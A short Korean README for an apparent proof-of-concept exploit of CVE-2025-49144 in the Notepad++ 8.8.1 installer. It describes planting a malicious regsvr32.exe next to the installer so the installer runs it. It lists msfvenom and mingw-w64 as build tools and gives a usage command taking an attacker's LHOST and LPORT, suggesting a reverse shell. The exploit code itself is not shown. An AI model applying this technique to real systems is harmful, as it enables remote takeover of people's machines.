
Notepad++ 8.8.1 설치 프로그램의 CVE-2025-49144 취약점을 악용하는 개념 증명(PoC)입니다.
이 저장소는 Notepad++ 8.8.1 설치 프로그램의 CVE-2025-49144 취약점을 악용하는 기능적인 개념 증명(PoC)을 포함합니다. 악성 실행은 취약한 설치 프로그램과 동일한 디렉터리에 바이너리(regsvr32.exe)를 배치함으로써 발생합니다. 설치 프로그램이 실행되면 컨텍스트를 상속받아 페이로드를 트리거합니다.
⚠️ 면책 고지
이 코드는 교육 및 연구 목적으로만 엄격히 사용됩니다. 명시적 허가 없이 시스템에서 무단 사용하는 것은 법률 위반이 될 수 있습니다.
저자는 이 도구와 관련된 어떠한 오용 또는 악의적인 활동에 대해서도 책임을 지지 않습니다.
msfvenom (Metasploit Framework의 일부)mingw-w64 (x86_64-w64-mingw32-gcc)npp.8.8.1.Installer.x64.exe (수동으로 동일한 디렉터리에 배치해야 함)python3 exploit.py -i <LHOST> -p <LPORT>
예시:
python3 exploit.py -i 192.168.100.10 -p 4444
이 명령은 다음 파일을 생성합니다:
[
]